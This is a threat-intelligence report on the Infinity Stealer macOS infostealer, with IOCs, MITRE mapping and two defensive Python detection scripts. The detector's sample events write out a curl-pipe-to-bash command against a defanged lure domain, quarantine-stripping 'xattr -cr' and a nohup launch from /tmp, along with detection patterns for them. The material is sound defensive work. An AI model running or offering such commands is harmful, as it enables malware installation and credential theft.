Full Report
A new info-stealing malware named Infinity Stealer is targeting macOS systems with a Python payload packaged as an executable using the open-source Nuitka compiler. [...]
Analysis Summary
# Tool/Technique: Infinity Stealer
## Overview
Infinity Stealer is a sophisticated information-stealing malware specifically designed for macOS. It is notable for being written in Python and compiled into a native Mach-O executable using the Nuitka compiler. The malware is typically delivered via the "ClickFix" social engineering technique, which tricks users into manually executing malicious commands under the guise of a Cloudflare CAPTCHA or human verification check.
## Technical Details
- **Type:** Malware Family (Infostealer)
- **Platform:** macOS
- **Capabilities:** Credential theft, keychain extraction, screenshot capture, cryptocurrency wallet theft, anti-analysis.
- **First Seen:** March 2026 (Reported)
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1566.002 - Phishing: Spearphishing Link
- **TA0002 - Execution**
  - T1059.004 - Command and Scripting Interpreter: Unix Shell
  - T1204.002 - User Execution: Malicious File
- **TA0005 - Defense Evasion**
  - T1027 - Obfuscated Files or Information
  - T1140 - Deobfuscate/Decode Files or Information (Nuitka compilation)
  - T1553.001 - Subvert Trust Controls: Gatekeeper Bypass (xattr removal)
  - T1497 - Virtualization/Sandbox Evasion
- **TA0006 - Credential Access**
  - T1555.001 - Credentials from Password Stores: Keychain
  - T1555.003 - Credentials from Password Stores: Web Browsers
- **TA0009 - Collection**
  - T1113 - Screen Capture
- **TA0010 - Exfiltration**
  - T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Browser Harvesting:** Extracts credentials and sensitive data from Chromium-based browsers (Chrome, Edge, etc.) and Firefox.
- **Keychain Access:** Targets the macOS Keychain to steal saved passwords and certificates.
- **Crypto Theft:** Scans for and exfiltrates data related to various cryptocurrency wallet extensions and applications.
- **Developer Secret Harvesting:** Searches for plaintext secrets in developer-centric files, specifically targeting `.env` files.
- **System Capture:** Capable of taking screenshots of the victim's desktop.
### Advanced Features
- **Nuitka Compilation:** Unlike PyInstaller (which bundles bytecode), Nuitka converts Python code into C and then compiles it to a native Mach-O binary. This significantly increases the difficulty of reverse engineering and evades many static analysis signatures.
- **ClickFix Delivery:** Utilizes a highly effective social engineering lure mimicking Cloudflare's human verification, prompting users to copy-paste a malicious `curl` command into their Terminal.
- **Environment Variable Passing:** Sensitive C2 configuration and tokens are passed to the loader via environment variables to avoid hardcoded strings in the binary.
- **Anti-Analysis:** Includes specific checks to detect if the malware is running in virtualized environments or sandboxes before proceeding with the infection.
## Indicators of Compromise
- **File Names:**
  - `UpdateHelper.bin` (Stage-3 payload)
  - Nuitka loader (approx. 8.6 MB Mach-O)
- **Network Indicators:**
  - `update-check[.]com` (ClickFix lure domain)
  - Telegram API (exfiltration notifications)
- **Behavioral Indicators:**
  - Execution of `curl` commands pasted into Terminal containing base64 strings.
  - Manual removal of the quarantine flag using `xattr -cr`.
  - Use of `nohup` to execute background processes from `/tmp`.
  - Terminal windows closing unexpectedly after a script execution.
## Associated Threat Actors
- **Unknown:** Specific group names have not yet been attributed, though the "ClickFix" technique is widely used by various cybercriminal elements.
## Detection Methods
- **Behavioral Detection:** Monitoring for Terminal processes that invoke `curl`, pipe to `bash`, and subsequently run `xattr` to remove quarantine flags on new binaries in `/tmp`.
- **Nuitka Pattern Matching:** Detecting the presence of Nuitka-compiled Python libraries and artifacts within Mach-O binaries.
- **Network Monitoring:** Alerting on POST requests to unknown or suspicious domains immediately following Terminal-based script execution.
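The "Nuitka Pattern Matching" method above, and the Nuitka-versus-PyInstaller point made under Advanced Features, can be turned into a small static triage step. The Python below is an added example, not code from the report or from any vendor product: it checks a file's Mach-O magic bytes and searches its printable strings for Nuitka build markers. `NUITKA_ONEFILE_PARENT` is an environment variable the Nuitka onefile bootstrap uses; the other marker strings and both sample blobs are constructed assumptions for illustration, not artifacts extracted from the malware.

```python
import re

# Mach-O magic numbers as they appear on disk (first four bytes of the file).
MACHO_MAGICS = {
    b"\xcf\xfa\xed\xfe": "MH_MAGIC_64 (64-bit, little-endian)",
    b"\xfe\xed\xfa\xcf": "MH_CIGAM_64 (64-bit, big-endian)",
    b"\xce\xfa\xed\xfe": "MH_MAGIC (32-bit, little-endian)",
    b"\xca\xfe\xba\xbe": "FAT_MAGIC (universal binary)",
}

# Build markers. NUITKA_ONEFILE_PARENT is an environment variable used by the
# Nuitka onefile bootstrap; "Nuitka"/"nuitka" are assumed markers for
# illustration and should be validated against known samples before use.
NUITKA_MARKERS = (b"NUITKA_ONEFILE_PARENT", b"Nuitka", b"nuitka")
PYTHON_RUNTIME = re.compile(rb"Python 3\.\d+(?:\.\d+)?")

# Constructed sample blobs (not real files): a Mach-O header followed by the
# kind of strings a Nuitka build leaves behind, and a plain Mach-O with none.
SAMPLE_NUITKA_BLOB = (b"\xcf\xfa\xed\xfe" + b"\x00" * 28 + b"__TEXT\x00"
                      + b"NUITKA_ONEFILE_PARENT\x00" + b"Python 3.11.6\x00"
                      + b"\x01\x02\x03" * 10)
SAMPLE_PLAIN_BLOB = (b"\xcf\xfa\xed\xfe" + b"\x00" * 28
                     + b"__TEXT\x00hello world\x00")


def extract_strings(blob, min_len=6):
    """Printable ASCII runs of at least min_len bytes, like the `strings` tool."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)


def triage(blob):
    """Return the Mach-O type, Nuitka markers found, embedded Python runtime
    strings, and an overall suspect flag for one file's bytes."""
    magic = MACHO_MAGICS.get(blob[:4])
    strings = extract_strings(blob)
    markers = sorted({m.decode() for m in NUITKA_MARKERS
                      if any(m in s for s in strings)})
    runtimes = sorted({m.group(0).decode() for m in PYTHON_RUNTIME.finditer(blob)})
    return {
        "macho": magic,
        "nuitka_markers": markers,
        "python_runtime": runtimes,
        # Flag only when both conditions hold: a Mach-O that carries Nuitka strings.
        "suspect_nuitka_macho": magic is not None and bool(markers),
    }


def triage_file(path):
    """Convenience wrapper for a file on disk."""
    with open(path, "rb") as fh:
        return triage(fh.read())


if __name__ == "__main__":
    for name, blob in (("nuitka-like", SAMPLE_NUITKA_BLOB), ("plain", SAMPLE_PLAIN_BLOB)):
        print(name, triage(blob))
```

Run `triage_file()` against a suspected loader (the report's ~8.6 MB Mach-O is the obvious candidate) and feed the result into a wider verdict; the markers are heuristics, so a hit should be corroborated with the behavioral indicators rather than treated as proof on its own.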
## Mitigation Strategies
- **User Education:** Train users to never copy and paste commands from websites into their Terminal, especially those claiming to be "verification steps."
- **Terminal Restrictions:** Implement MDM policies that restrict the use of Terminal for non-administrative users where appropriate.
- **System Hardening:** Ensure macOS Gatekeeper and XProtect are enabled and monitored for bypass attempts.
- **EDR Configuration:** Configure Endpoint Detection and Response (EDR) tools to alert on the removal of the `com.apple.quarantine` attribute from binaries.
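The behavioral and network detection methods listed earlier, together with the EDR quarantine-removal alert in the mitigation list above, can be expressed as one per-session correlation rule. The Python below is an added example, not report or product code: the event schema (`sid`, `type`, `image`, `cmdline`, `method`, `host`, `ts`) is an assumption standing in for whatever an EDR actually emits, and the events are constructed to mirror the chain the report describes (curl piped to a shell, `xattr -cr` on a `/tmp` binary, a `nohup` launch, and a POST shortly afterwards) next to a benign session that also uses `curl`.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not real EDR output). "sid" groups events
# from one interactive session; s1 is benign, s2 mirrors the reported chain.
SAMPLE_EVENTS = [
    {"ts": 100, "sid": "s1", "type": "proc", "image": "/bin/zsh",
     "cmdline": "git status"},
    {"ts": 101, "sid": "s1", "type": "proc", "image": "/usr/bin/curl",
     "cmdline": "curl -sS https://pypi.org/simple/ -o /dev/null"},
    {"ts": 102, "sid": "s1", "type": "net", "method": "GET", "host": "pypi.org"},
    {"ts": 200, "sid": "s2", "type": "proc", "image": "/bin/zsh",
     "cmdline": "curl -fsSL hxxp://update-check[.]com/verify | bash"},
    {"ts": 201, "sid": "s2", "type": "proc", "image": "/usr/bin/xattr",
     "cmdline": "xattr -cr /tmp/UpdateHelper.bin"},
    {"ts": 202, "sid": "s2", "type": "proc", "image": "/usr/bin/nohup",
     "cmdline": "nohup /tmp/UpdateHelper.bin"},
    {"ts": 205, "sid": "s2", "type": "net", "method": "POST",
     "host": "api.telegram.org"},
]

TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|z)?sh\b")
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def _basename(path):
    return path.rsplit("/", 1)[-1]


def _touches_temp(tokens):
    return any(t.startswith(TEMP_DIRS) for t in tokens)


def classify(event):
    """Return the set of single-event rules a process event matches."""
    hits = set()
    if event.get("type") != "proc":
        return hits
    cmd = event.get("cmdline", "")
    tokens = cmd.split()
    exe = _basename(event.get("image", ""))
    # Lure step: curl output piped straight into a shell, or a long base64 blob.
    if re.search(r"\bcurl\b", cmd) and (PIPE_TO_SHELL.search(cmd) or BASE64_BLOB.search(cmd)):
        hits.add("curl_pipe_shell")
    # Gatekeeper bypass: xattr clearing (-c) or deleting (-d) attributes on a temp path.
    if exe == "xattr":
        flags = [t for t in tokens if t.startswith("-")]
        strips = any("c" in f or "d" in f for f in flags) or "com.apple.quarantine" in tokens
        if strips and _touches_temp(tokens):
            hits.add("quarantine_strip_tmp")
    # Background launch of a binary living in a temp directory.
    if exe == "nohup" and _touches_temp(tokens):
        hits.add("nohup_from_tmp")
    return hits


def detect(events, window=300):
    """Correlate events per session. Returns {sid: sorted rule names} for
    sessions that show the lure step plus at least one follow-on step."""
    by_sid = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_sid[ev["sid"]].append(ev)
    findings = {}
    for sid, evs in by_sid.items():
        rules, lure_ts = set(), None
        for ev in evs:
            hits = classify(ev)
            if "curl_pipe_shell" in hits and lure_ts is None:
                lure_ts = ev["ts"]
            rules |= hits
            # Network step: a POST within `window` seconds of the lure command.
            if (ev.get("type") == "net" and ev.get("method") == "POST"
                    and lure_ts is not None and 0 <= ev["ts"] - lure_ts <= window):
                rules.add("post_after_script")
        if "curl_pipe_shell" in rules and len(rules) >= 2:
            findings[sid] = sorted(rules)
    return findings


if __name__ == "__main__":
    for sid, rules in detect(SAMPLE_EVENTS).items():
        print(f"session {sid}: {', '.join(rules)}")
```

Requiring the lure step plus at least one follow-on step keeps a lone `curl` in a developer's shell from paging anyone, while the `xattr` rule on its own is still worth a lower-severity alert, which is the quarantine-attribute signal the EDR recommendation above asks for.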
## Related Tools/Techniques
- **PyInstaller:** A common but less evasive Python packaging tool.
- **ClearFake / ClickFix:** The broader class of social engineering lures involving fake browser or system updates.
- **Cthulhu Stealer / AMOS:** Other prominent macOS-specific information stealers.